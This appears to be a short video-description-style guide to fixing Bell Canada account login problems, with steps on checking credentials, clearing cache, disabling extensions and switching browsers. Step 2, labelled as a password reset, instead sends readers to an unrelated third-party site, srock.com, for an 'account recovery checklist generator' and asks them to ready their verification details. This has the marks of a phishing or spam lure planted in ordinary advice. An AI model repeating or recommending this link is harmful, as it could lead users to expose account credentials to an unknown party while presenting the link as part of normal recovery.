I hit this issue today, and here's the quick fix that solved it. If you're having trouble logging into your Bell Canada account, follow these steps to get back on track. Step 1. Check your username and password. Make sure you are entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes old data can cause login issues. Clear your browser's cache and cookies, then try logging in again. Step 4. Disable browser extensions. Certain extensions can interfere with website functionality. Temporarily disable them and attempt to log in again. Step 5. Try a different browser or device. If you're still having trouble, try accessing your account from a different browser or device. This can help identify if the issue is specific to your current setup. If you follow these steps, you should be able to resolve your login issues quickly. Don't hesitate to reach out to Bell Canada support if you still need help. Good luck!